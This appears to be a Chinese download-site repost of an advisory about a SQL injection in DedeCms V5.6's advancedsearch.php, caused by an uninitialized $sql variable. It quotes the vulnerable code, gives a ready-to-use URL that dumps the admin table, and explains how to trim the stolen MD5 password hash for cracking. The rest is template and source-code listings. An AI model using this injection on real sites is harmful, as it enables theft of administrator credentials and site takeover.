DedeCms V5.6漏洞变量未初始化导致鸡助漏洞-资源分享吧

漏洞描述: 健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。高效率标签缓存机制：允许对类同的标签进行缓存，在生成 HTML的时候，有利于提高系统反应速度，降低系统消耗的资源。模型与模块概念并存：在模型不能满足用户所有需求的情况下，DedeCMS推出一些互动的模块对系统进行补充，尽量满足用户的需求。 plus/advancedsearch.php $sql 变量未初始化。导致鸡助漏洞

复制代码

代码如下:

if($mid == 0) //必须绕过。 { showmsg(\’参数不正确，高级自定义搜索必须指定模型id\’, \’javascript\’); exit(); } $query = \”select maintable, mainfields, addontable, addonfields, template from dede_advancedsearch where mid=\’$mid\’\”; $searchinfo = $dsql->GetOne($query); if(!is_array($searchinfo)) //囧啊，绕过有难度。 { showmsg(\’自定义搜索模型不存在\’,\’-1\’); exit(); } $template = $searchinfo[\’template\’] != \’\’ ? $searchinfo[\’template\’] : \’advancedsearch.htm\’; if(empty($sql)) //人品问题，成功绕过！{ ………….. }else{ $sql = urldecode($sql); $query = $sql; } $sql = urlencode($sql); $dlist = new DataListCP(); $dlist->pageSize = 20; $dlist->SetParameter(\”sql\”, $sql); $dlist->SetParameter(\”mid\”, $mid); …………… $dlist->SetTemplate($templatefile); $dlist->SetSource($query); ………….<*参考 *>

测试方法: 本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` 密码是32位MD5减去头5位，减去尾七位，得到20 MD5密码，方法是，前减3后减1，得到16位MD5

常见问题FAQ

免费下载或者VIP会员专享资源能否直接商用？: 本站所有资源版权均属于原作者所有，这里所提供资源均只能用于参考学习用，请勿直接商用。若由于商用引起版权纠纷，一切责任均由使用者承担。更多说明请参考 VIP介绍。

织梦模板使用说明: 你下载的织梦模板并不包括DedeCMS使用授权，根据DedeCMS授权协议，除个人非盈利站点外，均需购买DedeCMS商业使用授权。购买地址： http://www.desdev.cn/service-dedecms.html

E启学在线网校网站在线教育校园教学平台程序系统V1.0源码

Laravel开发MeEdu在线点播网站源码知识付费应用系统源码

一比一精仿电影挖片网苹果cmsv10模板

织梦高仿dede58织梦模板下载站完整无错整站版源码 1.69GB打包

蓝色清晰织梦资源网下载站源码

全景通旗舰版最新源码内核到krpano1.19pr8 支持任何高清图

thinkPHP音视频素材资源下载站整站源码带会员系统+支付接口

仿集图网模板图片素材类模板织梦下载站源码带整站数据

织梦蓝色图纸展示类企业网站源码

Thinkphp5.0响应式进销存仓库管理系统源码

DedeCms V5.6漏洞变量未初始化导致鸡助漏洞

常见问题FAQ

小编 VIP

发表评论取消回复

找资源就上「资源分享吧」

WWW.ZYFX8.CN

常见问题FAQ

小编 VIP

发表评论 取消回复

相关推荐

找资源就上「 资源分享吧 」

WWW.ZYFX8.CN

发表评论取消回复

找资源就上「资源分享吧」